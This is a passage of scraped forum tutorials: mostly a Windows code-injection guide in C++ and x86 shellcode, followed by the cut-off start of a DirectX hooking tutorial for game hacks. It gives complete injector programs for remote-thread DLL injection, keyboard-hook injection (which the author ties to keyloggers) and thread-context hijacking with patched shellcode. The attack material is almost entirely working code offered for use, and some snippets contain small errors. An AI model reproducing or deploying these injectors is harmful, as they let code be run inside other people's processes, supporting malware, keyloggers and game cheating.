conflicts with the system int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } This code shows that we cannot pass more than 1 parameter to CreateRemoteThread so we need to create a struct (PARAMETERS) and pass it to the remote function I did a tutorial in past for this, check out: http://www.rohitab.c...ion-tutorial-c/ NOTE FOR VISTA/WIN7 CreateRemoteThread() for windows Vista and Windows 7 isn't working because of boundaries, the solution is the undocumented function NtCreateThreadEx(), we can get it from ntdll.dll, and replace CreateRemoteThread() with it in the above code (and remember to adjust the parameters) HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } //so to use in the above code like this: HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress); // // DLL INJECTION Performing Dll injection is much more easier, we don't have to create a struct of parameters beacause LoadLibraryA has only 1 parameter #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> //For Vista/Win7: HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); using namespace std; DWORD getPid(string procName); int privileges(); int main() { privileges(); //don't mind of the result, because maybe it fails because you already have that privilege DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * dll = "C:\\mydll.dll" //--------now we are ready to inject unsigned long LoadLib = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); LPVOID DataAddress = VirtualAllocEx(p, NULL, strlen(dll) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(p, DataAddress, dll, strlen(dll), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress, 0, NULL); //For Vista/Win7 //HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress); if (thread!=0){ //injection completed WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } //for VISTA/WIN7 typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } so if we want to check which OS are we running so to use CreateRemoteThread and NtCreateThreadEx: int CheckOSVersion() { /* * Windows XP = 1 (NT 5.0) * Windows Vista = 2 (NT 6.0) * Windows 7 = 3 (NT 6.1) * Windows 8 = 4 (NT 6.2) --> on Windows 8 CreateRemoteThread works perfectly!! */ OSVERSIONINFO osver; osver.dwOSVersionInfoSize = sizeof(osver); if (GetVersionEx(&osver)) { if (!(osver.dwPlatformId == VER_PLATFORM_WIN32_NT)) return 0; if (osver.dwMajorVersion == 5) return 1; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 0) return 2; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 1) return 3; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 2) return 4; } else return 0; } //use: char type[50]; int os = CheckOSVersion(); if (os == 0) return 0; if (os==1) strcpy(type, "Windows XP"); if (os==2) strcpy(type, "Windows Vista"); if (os==3) strcpy(type, "Windows 7"); if (os==4) strcpy(type, "Windows 8"); if you want to check if you are on a 64bit or 32bit OS by code: //the size of void* is the answer if (sizeof(void*) == 4) //is 32bit if (sizeof(void*) == 8) //is 64bit Other way I found many people talking about RtlCreateUserThread(), well it can be implemented easily (it is in ntdll.dll), but has a flaw, if you inject a dll with this function you cannot use CreateThread() inside it but you need to implement RtlCreateUserThread() in the dll too; i don't know why but it is. The implementation is: typedef struct ID{ PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef long (*myRtlCreateUserThread) (HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN, ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID); myRtlCreateUserThread RtlCreateUserThread; RtlCreateUserThread=(myRtlCreateUserThread)GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlCreateUserThread"); IMPORTANT: 32-BIT / 64-BIT This is a portability-injection table: - 32bit program inject 32bit dll in a 32bit target - 32bit program inject 64bit dll in a 64bit target - 64bit program inject 32bit dll in a 32bit target - 64bit program inject 64bit dll in a 64bit target the first type and the fourth type are easy to code, but if you dare getting in troubles with the second and the third take a look at this paper: http://www.corsix.or...ction-and-wow64 2) Code injection with SetWindowsHookEx Setting hooks is a tipical action of keyloggers over WH_KEYBOARD hook type. This method makes them perfect in capturing key strokes BUT if we inject a dll using hooks the program that set the hook must keep running otherwise the dll is suddenly unloaded. To perform this type of injection we don't need directly the PID of the process but the Thread ID of it. We obtain the Thread ID from the PID: DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } Now let's jot down some code about SetWindowsHookEx() #include <cstdlib> #include <iostream> #include "windows.h" #include "tlhelp32.h" using namespace std; DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); int main(int argc, char *argv[]) { HHOOK hproc; HOOKPROC cbt; HMODULE dll = LoadLibrary("DllHook.dll"); //the dll tha we will inject that contains the hook procedure cbt = (HOOKPROC)GetProcAddress(dll, "MyProcedure"); //get the address of our Procedure DWORD id = GetThreadID(getPid("notepad.exe")); //in this example we want to set the hook in a specific target if (id == 0) return 0; //if id == 0 means that the process isn't running hproc = SetWindowsHookEx(WH_KEYBOARD, cbt, dll, id); //if we wanted to set the hook in every process we could replace 'id' with 0 cin.get(); UnhookWindowsHookEx(hproc); //When we want to remove the hook return EXIT_SUCCESS; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } Now the our Dll that contains the hook procedure (in this case is named DllHook.dll) #include <windows.h> #include <stdio.h> #include <stdlib.h> __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp); __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp){ //here goes our code return CallNextHookEx(NULL, code, wp, lp); //this is needed to let other applications set other hooks on this target } BOOL APIENTRY DllMain (HINSTANCE hInst, DWORD reason, LPVOID reserved) { switch (reason) { case DLL_PROCESS_ATTACH: break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } /* Returns TRUE on success, FALSE on failure */ return TRUE; } 3) Code Injection modifying the Main Thread This part is a bit more complicated, but works on any version of WINDOWS and doesn't need to keep the injector running steps: - Open the target Process through the PID (Api used: OpenProcess()) - Allocate space in the remote process for our function and parameters (Api used: VirtualAllocEx()) - Get the target process's thread ID - Open the remote thread and suspend it (Api used: OpenThread() and SupendThread()) - Get the remote thread context (Api used: GetThreadContext()) - Saving the current Eip and setting it to the address of our injected function - Write our function and parameters in the remote process (Api used: WriteProcessMemory()) - PATCH IN RUNTIME the injected function with the addresses of our parameters (Api used: WriteProcessMemory()) - Set the new remote thread context (Api used: SetThreadContext()) - Resume the remote thread and optionally free the memory (Api used: ResumeThread()) Before seeing the code i want to explain what our function will be. It is an assembly code (or shellcode) that performs our operation, but while coding we can't know the addresses of our parameters so we put placeholders, in other words, we put a label that will be replaced during execution with the right addresses. the assembly function is: push 0xACEACEAC ;-> placeholder for the address of our old EIP pushfd ;->save all flags registers pushad ;-> save all registers push 0xACEACEAC ;->placeholder for the address of the string 'User32.dll' mov ecx, 0xACEACEAC ;->placeholder for the address of LoadLibraryA call ecx ;-> traslated in c++: LoadLibrary("User32.dll") ;now the address of the LOADED LIBRARY User32.dll is in eax register push 0xACEACEAC ;->placeholder for the address of the string MessageBoxA push eax ;->push User32.dll into the stack mov edx,0xACEACEAC ;->placeholder for the address of GetProcAddress call edx ;translated in c++: GetProcAddress(LoadLibrary("User32.dll"), "MessageBoxA") ;now the address of MessageBoxA is in eax register push 0 ;push the fourth parameter of MessageBoxA (MB_OK) push 0xACEACEAC ;->placeholder for the address of the text (3 parameter) push 0xACEACEAC ;->placeholder for the address of the caption (2 parameter) push 0 ;push the first parameter into the stack (don't bother) call eax ;translated in c++: MessageBox(0, "caption", "text", MB_OK) popad ;restore all the registers popfd ;restore all the flags ret ;get back to right execution as i said before we can inject an assembly code or shellcode (they behave in the same way), so that assembly code converted in shellcode is: char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb9\xac\xce\xea\xac\xff\xd1\x68\xac\xce\xea\xac\x50\xba\xac\xce\xea\xac\xff\xd2\x6a\x00\x68\xac\xce\xea\xac\x68\xac\xce\xea\xac\x6a\x00\xff\xd0\x61\x9d\xc3"; now lets see the real full code: #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") using namespace std; int privileges(); DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); __declspec() void myFunc(); __declspec() void Useless(); int _tmain() { privileges(); unsigned long oldIP; DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; cout<<pid<<endl; HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * user32 = "User32.dll"; char * MsgBox = "MessageBoxA"; char * testo = "REPORT"; char * mex = "INJECTION THREAD: SUCCESS!"; unsigned long size_myFunc = (unsigned long)Useless - (unsigned long)myFunc; unsigned long GetProcAdr = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetProcAddress"); unsigned long Load32 = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); void * mexAddress = VirtualAllocEx(p, NULL, strlen(mex)+1, MEM_COMMIT, PAGE_READWRITE); void * testoAddress = VirtualAllocEx(p, NULL, strlen(testo)+1, MEM_COMMIT, PAGE_READWRITE); void * MsgboxAddress = VirtualAllocEx(p, NULL, strlen(MsgBox)+1, MEM_COMMIT, PAGE_READWRITE); void * DataAddress = VirtualAllocEx(p, NULL, strlen(user32)+1, MEM_COMMIT, PAGE_READWRITE); void * MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, DataAddress, user32, strlen(user32), NULL); //string user32.dll WriteProcessMemory(p, MsgboxAddress, MsgBox, strlen(MsgBox), NULL); //string MessageBoxA WriteProcessMemory(p, testoAddress, testo, strlen(testo), NULL); //string for caption WriteProcessMemory(p, mexAddress, mex, strlen(mex), NULL); //string for text DWORD thID = GetThreadID(pid); HANDLE hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID); SuspendThread(hThread); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)MyFuncAddress; ctx.ContextFlags = CONTEXT_CONTROL; WriteProcessMemory(p, MyFuncAddress, myFunc,size_myFunc, NULL); //After writing the function we patch it with the right addresses WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DataAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL); //CARICATO USER32.DLL WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 20), &MsgboxAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 26), &GetProcAdr, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 35), &testoAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 40), &mexAddress, 4, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); Sleep(1000); //wait a second! //if we want to free the used memory and the injected code that will take a short time of execution, //we can of course wait for it for a certain period with Sleep(); //but if the code will keep running with no ending we cannot free the memory otherwise it will crash the target application //VirtualFreeEx(p, MyFuncAddress, size_myFunc, MEM_DECOMMIT); //VirtualFreeEx(p, DataAddress, strlen(mytext)+1, MEM_DECOMMIT); CloseHandle(p); CloseHandle(hThread); system("PAUSE"); return EXIT_SUCCESS; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } __declspec(naked) void myFunc(){ _asm { push 0xACEACEAC pushfd pushad push 0xACEACEAC mov ecx, 0xACEACEAC call ecx push 0xACEACEAC push eax mov edx,0xACEACEAC call edx push 0 push 0xACEACEAC push 0xACEACEAC push 0 call eax popad popfd ret } } __declspec(naked) void Useless(){ //this let's us calculate the address of MyFunc _asm ret; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } Now i want to explain a bit for who didn't understand how to patch the function. Before i stated that i put placeholders that will be replaced with the right addresses, to help you i posted the shellcode that come handy when looking for the offset(position) of the placeholders. take a look at it, we want to patch the first item (oldIP), the placeholder is 0xACEACEAC that translated in hex is "\xac\xce\xea\xac". Now, you need to know that "\xXX" you see is a traslated value, and the first time we meet "\xac\xce\xea\xac" is after 1 "\xXX"... we can consider any "\xXX" such as a posistion, so: . 0 . 1 . 2 . 3 . 4 . 5 . 6 . ... "\x68\xac\xce\xea\xac\x9c\x60 ... so, the beginning address of MyFuncAddress corrisponds to . 0 . ( = \x68 ), and the beginning of the placeholder to . 1 ., so MyFuncAddress + 1... here we write the right address that will replace the first "\xac\xce\xea\xac" if we look for the second we find it in the eighth position so MyFuncAddress + 8... so on until we patch them all. we convent MyFuncAddress from void* to unsigned long so to do an aritmethic sum, then we convert the result back to void* (void*)((unsigned long) MyFuncAddress + each_offset) I noticed that people that use Dev-C++ get an error because it doesn't find OpenThread() and an error with asm tags, well i suggest you to get VisualC++... btw now i show you in a DLL INJECTION how you can get dinamically OpenThread() from kernel32.dll and use the shellcode instead of an asm tags: #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") using namespace std; char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb8\xac\xce\xea\xac\xff\xd0\x61\x9d\xc3"; typedef HANDLE (WINAPI* OpenThreadfunc)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId); OpenThreadfunc myOpenThread; void setOpenThread(); int privileges(); DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); int injectLibrary(char * process, char * dll); HMODULE kernel; int main(int argc, char *argv[]) { injectLibrary("notepad.exe", "C:\\fullpath\\myDll"); system("PAUSE"); return EXIT_SUCCESS; } int injectLibrary(char * process, char * dll){ setOpenThread(); if (myOpenThread == NULL){ cout<<"Error with OpenThread()"<<endl; return 1; } unsigned long oldIP; if (privileges()==1){ //we if you want to check privileges you can, but some times if you are administrator you can perform injection without them cout<<"Error couldn't get privileges..."<<endl; } DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * dllName = dll; unsigned long shsize = sizeof(shellcode); unsigned long Load32 = (unsigned long)GetProcAddress(kernel, "LoadLibraryA"); void * DllAddress = VirtualAllocEx(p, NULL, strlen(dllName)+ 1, MEM_COMMIT,PAGE_READWRITE); void * MyFuncAddress = VirtualAllocEx(p, NULL, shsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, DllAddress, dllName, strlen(dllName), NULL); DWORD thID = GetThreadID(pid); HANDLE hThread = myOpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID); SuspendThread(hThread); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)MyFuncAddress; ctx.ContextFlags = CONTEXT_CONTROL; WriteProcessMemory(p, MyFuncAddress, &shellcode, shsize, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DllAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); CloseHandle(p); CloseHandle(hThread); FreeLibrary(kernel); return 0; } void setOpenThread(){ kernel = LoadLibrary("kernel32.dll"); if (kernel != NULL) myOpenThread = (OpenThreadfunc)GetProcAddress(kernel, "OpenThread"); } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } WELL, FINISH!! I hope this tutorial will help you! ENJOY CODING! RosDevil Sursa: Code Injections [beginner and advanced] - rohitab.com - Forums

[h=1]Run-time directx hooking using code injection and vtable[/h]Author: [h=3]AnthIste[/h]Okay folks, today I'll be teaching you how to take control of DirectX without the use of MS Detours or somehow hooking Direct3DCreate. You will be able to inject your dll at any time and still have a working hook . This might not be the best way to do it, but it certainly worked for me. It might not work on the specific version of DirectX you have installed, though (More on that later). Even if it doesn't work universally I'm sure there could be a workaround and at least I learnt something (and I would like to share that ) NOTE: I am not an emotionless bastard, but I couldn't post with all my smileys... bleh. DISCLAIMER: Any loss of brain cells reading this long ass tutorial is your own responsibility. Also, the usual, use at your own risk, don't use it to hurt people etc.... Learn something and apply it constructively Required Knowledge / Tools I expect you to have a solid understanding of the following (else following this might be difficult) - Dll injection and possibilities that it creates - X86 Assembly - C++ (especially function pointers) - Simple detours - Debugging with OllyDbg - CheatEngine - DirectX - DirectX SDK Introduction I started this project quite accidentally. I am not aware of any d3d hacks for Warcraft III (or the purpose of having one ) so I thought it could be a challenge to make one. This game dynamically loads d3d8.dll to set up all its Directx related stuff. I'll use this game as an example because even though DirectX8 is old technology the theory still applies to DirectX9 (tested and working). I also think its a pretty pretty popular game so if you have a copy you can whip it out and work with me here . Its also the only game that I have that seems to load the Directx module at runtime which is cool because this system works regardless of that (and what's the fun if its too easy This IS the first tutorial that I've ever written so bear with me As I work through this I'll put some screenies to show what's going on. I guess images don't stay linked forever so I'll put a copy of the disassembly with the picture. Please note that this tutorial will focus a lot on the theory of the process so if you don't understand why certain variables are placed where or need to be told in what source file and between which braces a certain piece of code goes I suggest you learn more C++ and then come back for a second run. Overview of procedure Before I dive right into the action I'll just give a brief overview of what we're going to do here. Don't worry if it doesn't all make sense, I'll go through everything in more detail soon. =PART 1 : Information gathering dll and loader= Make a loader that will spawn the process we are working on (in this case war3.exe) Start it with the CREATE_SUSPENDED flag and inject our dll Resume the process. This dll WILL hook Direct3DCreate8. If we have access to an instance of a IDirect3D8 object we have access to just about everything . Hook CreateDevice using this object's vtable. When createDevice is called we have access to the created IDirect3DDevice8 object (and all its methods via the vtable). We will log all the info that we get here (pointers / addresses of objects and methods, offsets etc) for use in creating the final code. =PART 2 : Final dll= This dll can be injected with anything (eg winject) so I wont go over making a loader for it as well (but the above one will work after a bit of modification I guess). After finding what we were looking for in PART 1 we will do a bit of code injection to steal the address of our d3d device. Use this device to do a vtable hook on any desired d3d methods ------------------- PART 1 : Loader and information gathering --------------------------------- Woohoo time to start coding... We'll start of with the loader. Open up VC++ and create a new empty win32 project. Call it Loader. Add 3 new files: main.cpp inject.h inject.cpp inject.h will just have includes and the definition for our function: // inject.h #ifndef INC_INJECT #define INC_INJECT #include <windows.h> #include <iostream> HMODULE InjectDLL(DWORD ProcessID, char* dllName); #endif inject.cpp will contain our injection function. Im not going to deal with how that works, there are more than enough tutorials on the topic . Credit for this code goes to < bah cant find out whos it is :/, thats not good > // inject.cpp #include "inject.h" HMODULE InjectDLL(DWORD ProcessID, char* dllName) { HANDLE Proc; HANDLE Thread; char buf[50]={0}; LPVOID RemoteString, LoadLibAddy; HMODULE hModule = NULL; DWORD dwOut; if(!ProcessID) return false; Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessID); if(!Proc) { sprintf_s(buf, "OpenProcess() failed: %d", GetLastError()); MessageBoxA(NULL, buf, "Loader", NULL); return false; } LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"); if (!LoadLibAddy) { return false; } RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dllName), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); if (!RemoteString) { return false; } if (!WriteProcessMemory(Proc, (LPVOID)RemoteString, dllName, strlen(dllName), NULL)) { return false; } Thread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); if (!Thread) { return false; } else { while(GetExitCodeThread(Thread, &dwOut)) { if(dwOut != STILL_ACTIVE) { hModule = (HMODULE)dwOut; break; } } } CloseHandle(Thread); CloseHandle(Proc); return hModule; } Ok, time to make a loader. Ive tried my best to comment the code that it explains itself but here goes anyway. The loader and the dll will both be placed in the game's directory. We use GetModuleFileName to find the current directory. Append the target executable's name and our dll's name to the path to get the full path for use in injection and CreateProcess. // main.cpp #include <windows.h> #include <iostream> #include "inject.h" const char* EXE_NAME = "war3.exe"; // target executable const char* DLL_NAME = "dll.dll"; // dll to inject int WINAPI WinMain(HINSTANCE 